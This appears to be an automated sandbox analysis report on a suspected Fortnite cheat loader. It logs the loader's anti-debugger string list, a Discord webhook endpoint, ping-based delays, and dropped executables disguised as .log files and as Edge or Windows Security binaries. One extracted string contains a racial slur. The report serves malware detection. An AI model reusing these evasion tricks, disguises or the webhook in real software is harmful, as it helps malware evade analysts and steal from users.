Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: gh3zRWl4or.exe	Binary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- \|##COMBO_%02DUNKNOWN ITEM%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
Source: gh3zRWl4or.exe	Binary or memory string: OLLYDBG.EXE
Source: gh3zRWl4or.exe	Binary or memory string: X64DBG.EXE
Source: gh3zRWl4or.exe	Binary or memory string: WINDBG.EXE

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 4890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 1AF40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 970000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 1A6C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 1A500000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1310000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1AE30000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 2A50000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1AC50000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1A810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1600000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 2760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Memory allocated: 1A950000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 11F0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1ACB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174BD0

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8772

Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aowVPJEW.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fnSuHmrC.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BegQTYoT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uNKjQhPt.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZcXEVMnO.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XkTUfoHN.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OPvxZeSl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ASIzYbXK.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sozKoiId.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HiOQLkRz.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KAbPIEds.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vpYzbqhQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dZblWXPP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TqIVmuJi.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xSuJhsEU.log	Jump to dropped file

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-15270

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

API coverage: 7.5 %

Source: C:\Windows\Speech\physmeme.exe TID: 3964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4040	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 712	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Edge\msedge.exe TID: 368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876	Thread sleep count: 9028 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 336	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716	Thread sleep count: 8772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 1964	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 5916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 2848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 1552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 2040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 4040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 2824	Thread sleep time: -30000s >= -30000s
Source: C:\Edge\msedge.exe TID: 6228	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67418DADC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF67418DADC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_0062A69B
